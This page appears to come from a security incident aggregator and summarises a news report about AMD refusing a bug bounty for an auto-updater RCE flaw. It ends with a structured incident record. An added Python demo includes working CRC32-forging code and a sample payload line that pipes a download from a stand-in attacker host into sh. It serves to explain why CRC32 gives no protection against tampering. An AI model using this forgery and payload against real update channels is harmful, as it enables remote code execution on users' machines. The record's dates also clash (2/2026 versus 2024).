AMD: AMD denies researcher a $10,000 bug bounty after fixing critical auto-updater vulnerability — security flaw took 124 days to patch

AMD Denies $10,000 Bug Bounty for RCE Flaw Despite Researcher’s Cooperation

AMD has refused to pay a $10,000 bug bounty to security researcher Paul, who reported a remote code execution (RCE) vulnerability in the company’s auto-updater software. The flaw is exploited through a man-in-the-middle (MITM) attack on the updater’s download, and the report was initially rejected under AMD’s bug bounty policy, which excludes MITM-based exploits.

Despite the denial, Paul cooperated with AMD, temporarily taking down his public disclosure at the company’s request. AMD promised to issue a CVE, fix the software, and credit Paul, but not to pay a bounty. The researcher later regretted the agreement, as AMD repeatedly extended the disclosure timeline, citing delays in patching "multiple tools" beyond the original scope. The fix, released on June 9, 124 days after the initial report, consisted of replacing an insecure "http" link with "https" in the code.

AMD also overhauled the updater’s download mechanism, and Paul confirmed that the new version fetches drivers securely. However, the software still validates downloaded files with a CRC32 checksum, which detects accidental corruption but offers no protection against deliberate tampering. Adding irony to the situation, a Reddit user later noted that the vulnerable code path was not even active: the updater was already broken, so AMD could not push the fix through it, and users had to download the patched version manually.
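The two weaknesses described above, a plain-HTTP download that a MITM can substitute and a CRC32 check that cannot tell a substituted file from the genuine one, are worth seeing concretely. The following is an added example written for this page; it is not AMD’s updater code, and the "genuine" and "malicious" update blobs are constructed sample inputs. It shows that an attacker who can swap the download (the MITM position the plain-HTTP link allowed) can also make the swapped file pass a CRC32 check by appending four computed bytes, whereas a SHA-256 comparison against a pinned digest rejects the same file. The CRC forging follows the standard table-inversion technique for the reflected CRC-32 that zlib implements.

```python
import hashlib
import zlib

# Standard reflected CRC-32 polynomial; this reproduces zlib.crc32's table.
POLY = 0xEDB88320
TABLE = []
for i in range(256):
    c = i
    for _ in range(8):
        c = (c >> 1) ^ POLY if c & 1 else c >> 1
    TABLE.append(c)

# The high byte of every table entry is distinct, which is what lets a single
# CRC step be undone without knowing the byte that was fed in.
_REV = {entry >> 24: i for i, entry in enumerate(TABLE)}
assert len(_REV) == 256


def _inverse_step(y):
    """Undo one CRC-32 table step: given L(s) = TABLE[s & 0xFF] ^ (s >> 8), return s."""
    i = _REV[y >> 24]
    return ((y ^ TABLE[i]) << 8) | i


def forge_crc32_suffix(data, target_crc):
    """Return 4 bytes s such that zlib.crc32(data + s) == target_crc.

    Feeding four bytes X into CRC register r gives the same register as feeding
    four zero bytes into r ^ int.from_bytes(X, 'little'), because the per-byte
    step is linear over GF(2). So X = r ^ L^-4(t), with t the target register.
    """
    r = zlib.crc32(data) ^ 0xFFFFFFFF   # raw register after `data`
    t = target_crc ^ 0xFFFFFFFF         # raw register the target CRC requires
    for _ in range(4):
        t = _inverse_step(t)
    return (r ^ t).to_bytes(4, "little")


# Constructed sample inputs (not real AMD files).
GENUINE_UPDATE = b"DRIVER-SETUP v1.0\n" + bytes(range(64))
# The payload ends with a comment marker so the four forged bytes land in a
# trailing comment and do not disturb the script body.
MALICIOUS_UPDATE = b"#!/bin/sh\ncurl http://attacker.invalid/x | sh\n# "


def crc32_check(blob, expected_crc):
    """The weak validation: catches accidental corruption, not tampering."""
    return zlib.crc32(blob) == expected_crc


def sha256_check(blob, expected_digest_hex):
    """Strong validation against a digest pinned out of band (e.g. shipped over TLS)."""
    return hashlib.sha256(blob).hexdigest() == expected_digest_hex


def demo():
    """Swap the download the way a MITM on plain HTTP could, and test both checks."""
    expected_crc = zlib.crc32(GENUINE_UPDATE)
    expected_sha = hashlib.sha256(GENUINE_UPDATE).hexdigest()
    forged = MALICIOUS_UPDATE + forge_crc32_suffix(MALICIOUS_UPDATE, expected_crc)
    return {
        "crc_accepts_forgery": crc32_check(forged, expected_crc),
        "sha256_accepts_forgery": sha256_check(forged, expected_sha),
        "forged_crc": zlib.crc32(forged),
        "expected_crc": expected_crc,
    }


if __name__ == "__main__":
    print(demo())
```

Moving the download to HTTPS with certificate verification removes the easy MITM substitution; replacing CRC32 with a cryptographic hash pinned from a trusted source, or better a signature over the file, is what makes the local validation meaningful even if the transport is compromised.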

The case highlights ongoing tensions between researchers and vendors over bug bounty policies, particularly when critical vulnerabilities are downplayed or excluded from payouts.

Source: https://www.tomshardware.com/tech-industry/cyber-security/amd-denies-researcher-a-usd10-000-bug-bounty-after-fixing-critical-auto-updater-vulnerability-security-flaw-took-124-days-to-patch

AMD cybersecurity rating report: https://www.rankiteo.com/company/amd

"id": "AMD1781267811",
"linkid": "amd",
"type": "Vulnerability",
"date": "2/2026",
"severity": "25",
"impact": "1",
"explanation": "Attack without any consequences"
{'affected_entities': [{'industry': 'Technology/Semiconductors',
                        'name': 'AMD',
                        'type': 'Corporation'}],
 'attack_vector': 'Man-in-the-Middle (MITM)',
 'customer_advisories': 'Users required to manually download the patched '
                        'version of the auto-updater software',
 'date_resolved': '2024-06-09',
 'description': 'AMD refused to pay a $10,000 bug bounty to security '
                'researcher Paul, who reported a remote code execution (RCE) '
                'vulnerability in the company’s auto-updater software. The '
                'flaw was discovered via a man-in-the-middle (MITM) attack and '
                'initially rejected under AMD’s bug bounty policy, which '
                'excluded MITM-based exploits. Despite cooperation from the '
                'researcher, AMD did not issue a bounty but promised a CVE, a '
                'fix, and credit. The fix involved replacing an insecure '
                "'http' link with 'https' in the code, though the software "
                'still relies on the outdated CRC32 hash for file validation.',
 'impact': {'brand_reputation_impact': 'Negative impact due to handling of bug '
                                       'bounty and vulnerability disclosure',
            'operational_impact': 'Prevented AMD from pushing fixes until '
                                  'users manually downloaded the patched '
                                  'version',
            'systems_affected': 'AMD auto-updater software'},
 'investigation_status': 'Resolved',
 'lessons_learned': 'Ongoing tensions between researchers and vendors over bug '
                    'bounty policies; critical vulnerabilities may be '
                    'downplayed or excluded from payouts.',
 'post_incident_analysis': {'corrective_actions': "Replaced 'http' with "
                                                  "'https'; overhauled "
                                                  'download mechanism; planned '
                                                  'future improvements to file '
                                                  'validation',
                            'root_causes': "Insecure 'http' link in "
                                           'auto-updater software; reliance on '
                                           'outdated CRC32 hash for file '
                                           'validation; bug bounty policy '
                                           'exclusion of MITM-based exploits'},
 'recommendations': 'Review and update bug bounty policies to include all '
                    'critical vulnerabilities; improve transparency and '
                    'timeliness in vulnerability disclosure and patching '
                    'processes.',
 'references': [{'source': 'Original Article'}],
 'response': {'communication_strategy': 'Delayed disclosure timeline; credited '
                                        'researcher but did not pay bounty',
              'containment_measures': "Replaced insecure 'http' link with "
                                      "'https' in the auto-updater software",
              'recovery_measures': 'Users required to manually download the '
                                   'patched version',
              'remediation_measures': 'Overhauled the updater’s download '
                                      'mechanism; fixed RCE vulnerability'},
 'title': 'AMD Denies $10,000 Bug Bounty for RCE Flaw Despite Researcher’s '
          'Cooperation',
 'type': 'Vulnerability Exploitation',
 'vulnerability_exploited': 'Remote Code Execution (RCE) in auto-updater '
                            'software'}